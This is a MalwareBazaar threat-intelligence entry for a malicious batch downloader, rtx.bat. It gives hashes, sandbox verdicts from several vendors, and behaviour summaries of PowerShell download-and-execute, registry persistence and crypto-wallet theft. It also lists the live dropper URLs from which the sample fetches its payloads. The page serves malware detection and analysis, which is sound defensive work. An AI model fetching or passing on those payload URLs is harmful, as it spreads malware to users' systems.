MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 12


Intelligence 12 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c
SHA3-384 hash: 88de43e764f176100af0829c426a46231be6c9b0c2906af79e1784d637e18fafb9897c7e5d7e67b55d2d7d2d12c6a676
SHA1 hash: d5eaee93a9683bf01463a2b4207172b59351068b
MD5 hash: 47767d805b3fe511c2789dad7bf04a05
humanhash: princess-alaska-solar-violet
File name:rtx.bat
Download: download sample
File size:1'942 bytes
First seen:2025-05-23 13:57:25 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/x-msdos-batch
ssdeep 48:ujoMGGi/xajg47AeuvELPn3Zmto9q6Fyp1Hqy4lxe7L8LAlz9sDlqRSM:ujoM/s8s4Ee7LfZmtSfwp1Hqyqxev1vh
Threatray 43 similar samples on MalwareBazaar
TLSH T1CA41FDAB5883590C0671EFE1858A41AAD31EC2C60741EFCCF5E08495B43929A42EE98F
Magika batch
Reporter abuse_ch
Tags:bat

Intelligence

File Origin
# of uploads :
1
# of downloads :
59
Origin country :
NL NL
Vendor Threat Intelligence
Malware family:
asyncrat
Create hunting rule
ID:
1
File name:
samples-downloader.zip
Verdict:
Malicious activity
Analysis date:
2025-05-23 12:30:41 UTC
Tags:
arch-exec arch-doc loader auto arrow rat lumma stealer generic rustystealer xworm asyncrat rhadamanthys gcleaner vidar loki ransomware chstealer formbook proxyware ghostsocks phishing snake keylogger telegram evasion inno installer delphi putty rmm-tool pyinstaller autoit amadey botnet remote screenconnect
Link:
https://app.any.run/tasks/44f2ad99-7062-4ba4-9ddf-dcaa9c2f85f2

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.PUA.Powershell.Downloader-3.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68307fe644c3881e854c6779
Tags:
dropper shell overt
Result
Verdict:
Malware
Maliciousness:

Behaviour
Running batch commands
Сreating synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Moving a file to the %temp% subdirectory
Searching for the window
Creating a file
Creating a process with a hidden window
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Launching a tool to kill processes
Downloading the file
Enabling autorun
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
bitsadmin certutil crypto fingerprint lolbin powershell
Link:
https://www.filescan.io/uploads/68307f09fd02ed5e0584a858/reports/318e36e4-25c4-4827-abdb-aedeca75ba4f/overview
Verdict:
Malicious
Labled as:
Cert.Downloader.1.Generic
Link:
https://www.hybrid-analysis.com/sample/24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c
Result
Threat name:
n/a
Detection:
malicious
Classification:
spyw.evad
Score:
96 / 100
Link:
https://www.joesandbox.com/analysis/1697819
Signature
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Joe Sandbox ML detected suspicious sample
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1697819 Sample: rtx.bat Startdate: 23/05/2025 Architecture: WINDOWS Score: 96 88 github.com 2->88 90 objects.githubusercontent.com 2->90 92 2 other IPs or domains 2->92 98 Multi AV Scanner detection for submitted file 2->98 100 Yara detected Powershell download and execute 2->100 102 Joe Sandbox ML detected suspicious sample 2->102 104 Sigma detected: Suspicious Script Execution From Temp Folder 2->104 11 cmd.exe 1 2->11         started        signatures3 process4 signatures5 114 Suspicious powershell command line found 11->114 116 Tries to download and execute files (via powershell) 11->116 14 cmd.exe 3 11->14         started        17 conhost.exe 11->17         started        process6 signatures7 118 Suspicious powershell command line found 14->118 120 Tries to download and execute files (via powershell) 14->120 19 128582390.exe 1001 14->19         started        23 powershell.exe 14 16 14->23         started        26 sys.exe 3 14->26         started        28 powershell.exe 16 14->28         started        process8 dnsIp9 62 C:\Users\user\AppData\Local\...\win32ui.pyd, PE32+ 19->62 dropped 64 C:\Users\user\AppData\...\win32trace.pyd, PE32+ 19->64 dropped 66 C:\Users\user\AppData\...\win32process.pyd, PE32+ 19->66 dropped 74 72 other files (none is malicious) 19->74 dropped 106 Found pyInstaller with non standard icon 19->106 30 128582390.exe 4 6 19->30         started        94 github.com 140.82.113.3, 443, 49715, 49717 GITHUBUS United States 23->94 96 objects.githubusercontent.com 185.199.111.133, 443, 49716, 49719 FASTLYUS Netherlands 23->96 68 C:\Users\user\AppData\Local\Temp\...\sys.exe, PE32 23->68 dropped 108 Found many strings related to Crypto-Wallets (likely being stolen) 23->108 110 Powershell drops PE file 23->110 70 C:\Users\user\AppData\Local\Temp\...\rtx.exe, PE32+ 26->70 dropped 112 Drops large PE files 26->112 72 C:\Users\user\AppData\Local\Temp\...\rtx.rar, RAR 28->72 dropped file10 signatures11 process12 file13 86 C:\Users\user\AppData\Local\...\csrr.hxh, PE32 30->86 dropped 122 Creates an undocumented autostart registry key 30->122 124 Found many strings related to Crypto-Wallets (likely being stolen) 30->124 126 Creates multiple autostart registry keys 30->126 34 cmd.exe 30->34         started        36 cmd.exe 1 30->36         started        38 cmd.exe 1 30->38         started        40 11 other processes 30->40 signatures14 process15 file16 43 mpc.exe 34->43         started        46 conhost.exe 34->46         started        48 conhost.exe 36->48         started        50 taskkill.exe 36->50         started        52 conhost.exe 38->52         started        54 taskkill.exe 38->54         started        76 C:\Users\user\AppData\Local\Temp\...\mpc.exe, PE32 40->76 dropped 56 conhost.exe 40->56         started        58 conhost.exe 40->58         started        60 19 other processes 40->60 process17 file18 78 C:\ProgramData\Samsung\win32event.pyd, PE32 43->78 dropped 80 C:\ProgramData\Samsung\win32api.pyd, PE32 43->80 dropped 82 C:\ProgramData\Samsung\unicodedata.pyd, PE32 43->82 dropped 84 11 other files (none is malicious) 43->84 dropped
Score:
14%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c/
Threat name:
Win32.Downloader.Cert
Create hunting rule
Status:
Malicious
First seen:
2025-05-23 13:58:27 UTC
File Type:
Text (Batch)
AV detection:
6 of 24 (25.00%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=etoqo3kft3wbpekmgrdyx6thxpftqa7dupcne2cnmlaipt7x4noa._file
Verdict:
malicious
Label(s):
ramsay
Create hunting rule
Similar samples:
120b4cf74b478310991b88f2334efb065296fcd67ac3ea408d54ad3052f2d908
2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba
30eb8727af3b8a2f4551574c7d826e9f27480e79d242b92d392b1f64091acf12
57311d2b4a33c4cd2dd65302938876a40539eec1cea6df82539dce8e9c2f29ae
6b88286b240db5630c98d895fd188d079b4a88790dee601645afab7ae28cc578
8131c9b9baf8ffd125196f017bd8e1b5b24432a96b5295e8ce3b6f32e9e9bb17
a364cf1f815223ccb6ec8462e1c883567de1f8ccb8c3ba259aedef55210ae037
d1483b3180344ec09555db148cc7c21439fef002124bfd7ee74150f0be138375
ea1213c0a684662e8305cfe1c6eeebbb12a9d1404e7571438d3730cc1df1caab
error
+ 33 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery execution persistence spyware stealer
Link:
https://tria.ge/reports/250523-q9vy2as1gt/
Behaviour
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Adds Run key to start application
Looks up external IP address via web service
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies WinLogon for persistence
Malware Config
Dropper Extraction:
https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/sys.exe
https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/rtx.fbx
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Detect_PowerShell_Obfuscation
Create hunting rule
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Batch (bat) bat 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3550422/
  
Delivery method
Distributed via web download

Comments